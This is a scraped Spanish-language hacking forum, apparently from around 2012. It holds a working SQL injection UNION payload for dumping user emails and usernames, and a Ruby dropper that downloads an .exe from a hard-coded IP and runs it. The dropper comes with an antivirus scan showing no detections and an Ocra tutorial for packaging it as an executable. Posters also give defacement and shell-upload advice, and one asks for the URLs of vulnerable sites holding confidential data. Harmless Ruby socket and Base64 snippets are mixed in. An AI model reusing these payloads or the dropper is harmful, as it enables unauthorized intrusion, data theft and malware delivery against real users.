You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como Dice Snifer ... solo queda recordar 
esto es como montar en bici.... nunca se olvida solo es practicar de nuevo

Me Imagino que si usas Havij o algunas otras tools ... es porque ya sabes como funciona manualmente no ?

Salu2

Como lo menciona el te completo el tip, a mano quizá sea un poco mas rapido, Havij te ayudaria buscando los string o los interger, una vez que los encuentras solo es cuestion de inyectar el code, mira te explico una función:

CitarEn MySQL, cuando queremos limitar el rango de registros devueltos por una sentencia SELECT tenemos la opción de utilizar LIMIT:1   Select * FROM tabla LIMIT 10,5
Esta sentencia nos permite devolver 5 registros a partir del décimo. El ejemplo sería aplicable por ejemplo a un listado paginado con 5 registros por página y estuviésemos mostrando la tercera de ellas.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Entonces nuestra inyección quedaria asi

http://chicasextremadamentehermosasenmicasa.com/index.php?todasparami=-1+union+select+1,2,group_concat(email,0x3a,usuario),4+from+chicas_users+limit+1,30--

Despues modificas el limit

Citar+limit+30,60--

y asi sucesivamente espero y me comprendas, no hay que dejarle todo a las tools, tambien usar la cabeza.

En mis defaces, siempre he buscado el admin, no me imagino para que fines quieres los correos si no mas que para spam

¿Podrias ser tan amable de explicarme para que los necesitas?



Si no me entendiste me dices donde te atoraste


Buenas noches

+10 , Si es grande (5000) no lo gozaras usando tools , dale a mano y te sentiras mejor.
No te digo que no uses automatizadores , pero dejaselo a cuando tengas prisa y la web sea una birria.
Café y tiempo es la situación ideal para ponerte a hacerlo manual.

Me lo descargaré pues y le daré un ojo mañana en clase que es la presentación y no tendré nada que hacer.

... en serio a veces flipo con las preguntas de la gente.
Como vas a estudiarte en un tutorial como modificar un exploit? , aprende el lenguaje en  el cual esta codeado y tu mente e imaginación te diran que tocar para mejorarlo.

Bueno aqui estuve haciendo un simple downloader para ruby , lo hice como prueba para saber como actuaría en un entorno "de malware" , es muy básico pero tampoco lo voy a dar todo masticado , esta es una base a la cual podeís añadir cosillas para que sea una gran tool.

Código :

require 'Win32API'
require 'open-uri'

=begin
----------------------------------
| Coded by Sanko              |
| Simple Ruby Downloader |
----------------------------------
=end

archivo = 'sk.exe' #Nombre del archivo a descargar
url = 'http://199.91.152.95/cz989jnk55qg/67fcyfx9xsf31mz/sk.exe' #Url directa del archivo a descargar

archivo = open(archivo,"wb") #se abre se escribe se lee y se cierra , lo que viene siendo una descarga...
archivo.write(open(url).read)
archivo.close

aplicacion = Thread.start do #Hacemos que system ejecute el archivo descargado
	system 'sk.exe'
end

Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :

[Info]
Fecha del reporte: Wed, 12 Sep 2012 22:49:23 +0000
Archivo: downloader.exe
Tamaño: 5099284 bytes
MD5: 49e985612dcf90085bb9a61093abddc8
Estado: Limpio
Detecciones: 0 de 35 (0%)
Reporte: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reporte generado por You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

[Detecciones]
A-Squared - Clean
AVG Free - Clean
Ad-Aware - Clean
AntiVir (Avira) - Clean
ArcaVir - Clean
Avast 5 - Clean
BitDefender - Clean
BullGuard - Clean
COMODO Internet Security - Clean
Clam Antivirus - Clean
Dr.Web - Clean
ESET NOD32 - Clean
F-PROT Antivirus - Clean
F-Secure Internet Security - Clean
G Data - Clean
IKARUS Security - Clean
Immunet Antivirus - Clean
K7 Ultimate - Clean
Kaspersky Antivirus - Clean
MS Security Essentials - Clean
McAfee - Clean
Norman - Clean
Norton Antivirus - Clean
Panda Security - Clean
Quick Heal Antivirus - Clean
Rising Antivirus - Clean
Solo Antivirus - Clean
Sophos - Clean
Trend Micro Internet Security - Clean
VBA32 Antivirus - Clean
VIPRE - Clean
Vexira Antivirus - Clean
VirusBuster Internet Security - Clean
Zoner AntiVirus - Clean
eTrust-Vet - Clean

Gracias Elsuc por escanearme el archivo.

Y aqui una muestra de como se comporta :

OCRA es una gema de ruby que nos sirve para transformar los .rb que codeamos a .exe para poder ejecutar en cualquier windows que no tenga un "emulador" para el lenguaje.

En este caso lo instalaremos en windows ya que si queremos pasar nuestros .rb a .exe es lo lógico...

Abrimos cmd para instalar Ocra :

Citargem install ocra

una vez tengamos instalada la gema ocra , nos dirijimos a donde tengais vuestro .rb guardado , en mi caso C:\Users\Sanko.



Abrimos cmd , vamos a la ruta donde tenemos alojado a nuestro querido downloader.rb y escribimos :

ocra --output downloader.exe downloader.rb



y ya tenemos nuestro .rb convertido en aplicación - .exe



Como podeís ver la mayor putada es que vuestro simple código de 247bytes ahora pesa 4,86MB , podríamos haber usado otras gemas como por ejemplo rubyscript2exe pero son proyectos abandonados hace un tiempo los cuales dan MUCHOS problemas a la hora de compilar.

Saludos , Sanko.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esta es una pequeña guia sobre defacing que nos dejo aca nuestro querido okol :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aunque si quieres aprender realmente cada vulnerabilidad (las conocidas) es mejor que te des un paseo por la seccion de bugs y exploits donde encontraras tutoriales especificos para cada vulnerabilidad y asi poder aprender a hacerlas bien del todo.

Gracias, si por estuve viendo sobre las de jomala, worldpress y algunas herramientas aunque ya tengo varios scanners pero nunca he logrado defacear xD

Man deberías leerte algún libro sobre la ética antes.
Me refiero a un poco de teoría , que es un blackhat un grayhat y un whitehat , despues de leer sobre las 3 y optar cual es tu estilo ya puedes hacer lo que te plazca.
No puedes aprender y ponerte a defacear...en mi opinión deja el deface solo para venganzas o por necesidad , lograras lo mismo tanto si consigues encontrarle la falla , explotarla y lograr subir shell tanto como si despues de subir la shell borras y pones un index que diga tu nombre.

Encuanto a lo de etica ya se cual es mi camino esque como te explico yo ya llevo tiempo en esto solo que nunca he logrado defacear por que no le he colocado el 110%
y quiero hacerle por que voy ha trabajar en conujnto de unos amigos para un bien mp va va a ser dafceo por aca y haya no

Cada quien es libre de usar sus conocimientos para el bien y para el mal , solo digo que hay un punto medio en el que puedes divertirte sin necesidad de joder a un pobre empresario que busca ganarse la vida publicitandose en la red.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esta es una pequeña guia sobre defacing que nos dejo aca nuestro querido okol :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aunque si quieres aprender realmente cada vulnerabilidad (las conocidas) es mejor que te des un paseo por la seccion de bugs y exploits donde encontraras tutoriales especificos para cada vulnerabilidad y asi poder aprender a hacerlas bien del todo.

Gracias, si por estuve viendo sobre las de jomala, worldpress y algunas herramientas aunque ya tengo varios scanners pero nunca he logrado defacear xD

Man deberías leerte algún libro sobre la ética antes.
Me refiero a un poco de teoría , que es un blackhat un grayhat y un whitehat , despues de leer sobre las 3 y optar cual es tu estilo ya puedes hacer lo que te plazca.
No puedes aprender y ponerte a defacear...en mi opinión deja el deface solo para venganzas o por necesidad , lograras lo mismo tanto si consigues encontrarle la falla , explotarla y lograr subir shell tanto como si despues de subir la shell borras y pones un index que diga tu nombre.

Esta es una pequeña guia sobre defacing que nos dejo aca nuestro querido okol :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aunque si quieres aprender realmente cada vulnerabilidad (las conocidas) es mejor que te des un paseo por la seccion de bugs y exploits donde encontraras tutoriales especificos para cada vulnerabilidad y asi poder aprender a hacerlas bien del todo.

Interesante man , buen post.

Ping no-ip...
Y ya esta , con la no ip no haces una mierda no sea te la crees desde un vpn que te coje otras dns y aun asi pueden adivinar tu ip real.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
y la ip completamente visible en los logs xD

Podrias hacer tu un tutorial y enseñas a no mostrarlos 

Perfecto man , me viene al pelo xd.
Un placer volver a verte activo y vivo O.o

man , tu estas haciendonte un lio a ti y a todos xd.
Con el rollo que soltaste yo ya nose ni que es una web xd.
Aplicación dueña? lo que creo que quieres decir es con que han creado eso...
los .php los puedes crear incluso desde un bloc de notas , lo unico que importa es saber programar php... xd
Aqui no es tener un programa y decir : quiero una galeria de fotos xd.
Bien puedes bajarte algun src ya publico para poder hacer tu uploader de fotos... aun que asegurate de su seguridad ya que la mayoria de esos uploaders publicos pueden bypassearse xd.
Si tienes información confidencial en tu web y tienes un uploader mandame un MP y la ulr please XD.

Muy bueno man , habra que echarles un ojo  jaja

Bueno este code es un básico ejemplo de gserver en el que se conecta a 127.0.0.1:85 y lanza el mensaje que yo escribo en terminal , el sleep indica el tiempo el cual el servidor estará ONLINE para 127.0.0.1:85
Es una base muy útil ya que partiendo de esto puedes crear un sistema de id para los que se conecten al servidor y que cada uno pueda lanzar mensajes al servidor , asi como una especie de chat , incluso crear rangos y establecer comandos , es todo cuestión de imaginación ya lo iré procesando en mi cabeza xd.
Sin mas aburrimiento el ejemplo base :

require 'gserver'

class BasicServer < GServer
  def serve(io)
    palabra = gets.chomp
    io.puts(palabra)
  end
end

server = BasicServer.new(85)
server.start
sleep 60 # esta en segundos
server.shutdown

imagen ejemplo :

Pues simple ando jugando un poco con las librerias y demas y bueno pues aqui dejo esto :

# Easy Base64 Encoder-Decoder
# Texto -> Base64
# Base64 -> Texto
# Coded by Sanko
require "base64" # requerimos de la libreria base64
print "Escribe <encriptar> si deseas encriptar un texto (Texto -> Base64) \n"
print "Escribe <desencriptar> si deseas desencriptar un texto (Base64 -> Texto \n"

escritura = gets.chomp #Escriben tanto encriptar como desencriptar

# Ejemplo de if anidado , para los curiosos que no llegaran ahi aun.

if escritura == "encriptar" #si escriben encriptar...
  print "Has elejido encriptar de Texto a Base64 , Escriba el texto: \n" # se les imprimira esto en terminal
  texto = gets.chomp #Escriben el texto
  encriptar = Base64.encode64(texto) # El texto se encripta usando base64
  puts encriptar #Imprimimos el valor encriptado
elsif escritura == "desencriptar" # si escribieron desencriptar...
  print "Has elejido desencriptar de Base64 a Texto , Escriba para desencriptar: \n" # se les imprimira esto en terminal
  basetext = gets.chomp # Escriben el code base64
  desencriptar = Base64.decode64(basetext) # Desencripta base64 a texto
  puts desencriptar # Imprime el valor desencriptado
else # si ninguna de las dos anteriores condiciones se cumple...
  print "ERROR \n" #Imprime un error en pantalla
end

Ejemplo encriptar :




Ejemplo desencriptar :




Ejemplo ERROR :



Saludos , Sanko..

Bueno , aquí ando practicando con sockets y decidi armar una conexión cliente/servidor sencilla para que otros puedan usar esta base para futuros proyectos.

Asi que aqui dejo la base del Cliente :

#Coded by Sanko
require 'socket'
print "Escriba el host al que conectarse : \n"
host = gets.chomp # Indicamos host
print "Escriba el puerto al que conectarse : \n"
puerto = gets.chomp # Indicamos puerto
sock = TCPSocket.open(host, puerto) #Nos conectamos al host indicado escuchando el puerto indicado

while line = sock.gets
	puts line.chop
end
sock.close #cerramos conexion

Aqui dejo la base del Server :

#Coded by Sanko
require 'socket'
server = TCPServer.open(85) # Nos conectamos por el puerto 85 POR DEFAULT , se puede cambiar
loop { #Creamos un bucle con FINAL , se peuden hacer infinitos , Imaginaros para que ;)
	Thread.start(server.accept) do |cliente| # Iniciamos la conexion cliente-servidor
		cliente.puts(Time.now.ctime)
		cliente.puts 'Prueba de conexion cliente - servidor | Sanko | Ruby' #Enviamos un texto
		cliente.close #Cerramos conexion
	end
}

A partir de ahí podeís ir añadiendo mas cosas , etc.

Por ejemplo que el cliente genere al servidor :

#Coded by Sanko
require 'socket'
print "Escriba el host al que conectarse : \n"
host = gets.chomp # Elejimos host
print "Escriba el puerto al que conectarse : \n"
puerto = gets.chomp #Elejimos puerto

File.open('server.rb', 'w') do |config| #Abrimos/Creamos "server.rb"
#Lo modificamos para que dentro de ese archivo se escriba el codigo del server
	config.print"
require 'socket'
server = TCPServer.open(85)
loop {
	Thread.start(server.accept) do |cliente|
		cliente.puts(Time.now.ctime)
		cliente.puts 'Prueba de conexion cliente - servidor | Sanko | Ruby'
		cliente.close
	end
}"
end


print "Servidor creado correctamente , por favor ejecute server.rb como su \n"
print "Ahora pulse enter para continuar \n"
cualquiertecla = gets.chomp # pulsamos enter


sock = TCPSocket.open(host, puerto) #Nos conectamos a host y puerto

while line = sock.gets
	puts line.chop
end
sock.close #Cerramos conexion

Y tambien muchas otras cosas , las cuales no dire ya que si no tal vez JODAIS mis proyectos...
Es cosa de IMAGINACIÓN , nada mas...

Una vez ejecutado queda :



Un saludo y sigan dandole al ruby , tiene futuro.

WoW gracias en serio lo necesitaba , andaba leyendolo en ingles y el autor contaba muchas historias que entendia a medias... un humor un poco raro , asi que si esta traducido me vendra al pelo.
Lo leere tenlo por seguro , asi podre seguir avanzando los PDF para que otros aprendan.
Con muchas mas ganas ahora que veo que la gente empieza a interesarse por este gran lenguaje.

No es ningun tiempo perdido , para eso estan las preguntas , simple que se podría especificar mas desde un principio para no crear confusiones.

Sobre tu tema , podrias primero hacer un cuestionario al webmaster , en el que te indique la plataforma sobre la que esta creada la web , aplicaciones externas a la web que el introdujera , asi como buscadores o libro de visitas , cosas asi.

Ya con la información sacada del cuestionario sería comprobar cada aplicación en busca de una vulnerabilidad a la vista , puedes ayudarte de un scanner o de varios para "contrastar" , si no te sale nada tocará buscar a mano.

YA luego como es inventado puedes escribir acerca de ciertas fallas en un buscador ( la mas común reflected xss ) o en un libro de visitas ( la mas común stored xss ) o incluso hablarme de alguna vulnerabilidad mas grave en su foro asi como una sqli o blindsqli , todo es imaginación si es que te lo tienes que inventar claro.

Aunque si quieres un consejo personal , yo de ti googleaba unos dorks y realizaría un informe para una página real y asi matas dos pajaros de un tiro.
Le haces un favor al webmaster y te cumples el trabajo.

wow , esta bueno.